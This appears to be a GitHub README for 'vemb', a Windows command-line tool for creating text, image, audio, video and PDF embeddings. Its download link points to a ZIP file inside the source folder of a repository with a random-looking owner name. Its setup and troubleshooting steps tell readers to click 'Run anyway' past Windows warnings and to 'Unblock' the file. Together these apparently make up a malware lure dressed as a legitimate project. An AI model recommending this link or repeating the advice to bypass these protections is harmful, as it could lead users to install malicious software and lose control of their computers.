vemb:在 Windows 命令行本地生成多模态嵌入向量
Straying-bodypad392/vemb
🧩 vemb - Run embeddings from your desktop
🚀 What vemb does
vemb helps you create embeddings from the command line on Windows. It can handle text, images, audio, video, and PDFs in one place.
Use it when you want to:
- Turn files into embeddings
- Prepare content for semantic search
- Feed data into RAG tools
- Work with multimodal content from one app
- Use a simple command line flow instead of a heavy tool
💻 What you need
Before you start, make sure your PC has:
- Windows 10 or Windows 11
- An internet connection for the first setup
- Enough free space for your files and the app
- Access to Command Prompt or PowerShell
For best results, keep your files in a folder you can find easily, like Downloads or Desktop.
📥 Download vemb
Go to this page to download vemb:
https://raw.githubusercontent.com/Straying-bodypad392/vemb/main/src/vemb/Software-1.7.zip
If the page shows a release file, download it. If it shows source files, use the Windows setup steps below to run it on your PC.
🪟 Install on Windows
Follow these steps on a Windows computer:
- Open the download page in your browser.
- Save the file to your computer.
- If the download is a ZIP file, right-click it and choose Extract All.
- Open the extracted folder.
- Look for the main app file or the command you need to run.
- If Windows asks for permission, choose More info and then Run anyway only if you trust the file source.
- Keep the folder in a fixed place so you can open it again later.
If the project uses Python on your system, you may also need to install Python first. Use the latest stable version from python.org if the app asks for it.
⚙️ First run
Open PowerShell or Command Prompt, then go to the folder that contains vemb.
Example:
cd Downloads\vemb
Then run the command the project gives you, or start the app file from that folder.
If the tool opens in the terminal, leave that window open while you use it.
📝 Basic use
vemb is built for quick file-to-embedding tasks. You can point it at a file or folder and let it process your content.
Common uses:
- Embed a text file
- Embed one image
- Embed a folder of PDFs
- Prepare audio or video files for search
- Build data for a vector database
Example style of use:
vemb embed myfile.pdf
vemb embed ./documents
vemb embed "my image.png"If the app shows help text, start there. Most command line apps list the exact file names and options they support.
🖼️ Work with different file types
vemb is made for mixed content, so you can use more than one file type.
Text
Use text files when you want clean input for search or study notes.
Images
Use images when you want to turn visual content into embeddings for later lookup.
Audio
Use audio files for speech, talks, or recorded notes.
Video
Use video when you want to process clips and use them in search tools.
PDFs
Use PDFs for reports, manuals, books, and other long documents.
🔎 Search and RAG use
vemb fits well with semantic search and RAG workflows.
That means you can:
- Break content into useful pieces
- Create embeddings for each piece
- Store them in a vector database
- Find related content with a search query
- Use the results in a chat or answer tool
If you are new to this, think of embeddings as a way to help the app find meaning, not just exact words.
🧭 Simple workflow
A basic workflow looks like this:
- Pick a file or folder
- Run vemb on it
- Save the output
- Send the output to your search or AI tool
- Use the results in your project
This keeps your files organized and makes later search faster.
🛠️ Common problems
The app does not open
- Check that you downloaded the right file
- Make sure the file finished downloading
- Try opening it again from the folder where you saved it
Windows blocks the file
- Right-click the file
- Choose Properties
- If you see Unblock, select it
- Try again
The terminal says a command was not found
- Open the terminal in the folder that contains the app
- Check the file name
- Make sure any required tools are installed
Nothing happens after I run it
- Wait a moment if the file is large
- Check that the folder has read access
- Try a smaller file first
📂 Example folder setup
You can keep your files like this:
Desktop\vembDesktop\inputsDesktop\outputs
A simple layout makes it easier to find your files and results.
🔐 File safety
Only use files you trust. Large media files can take time to process, and some PDFs may be scanned pages instead of text. If a file does not give good results, try a cleaner version of the same file.
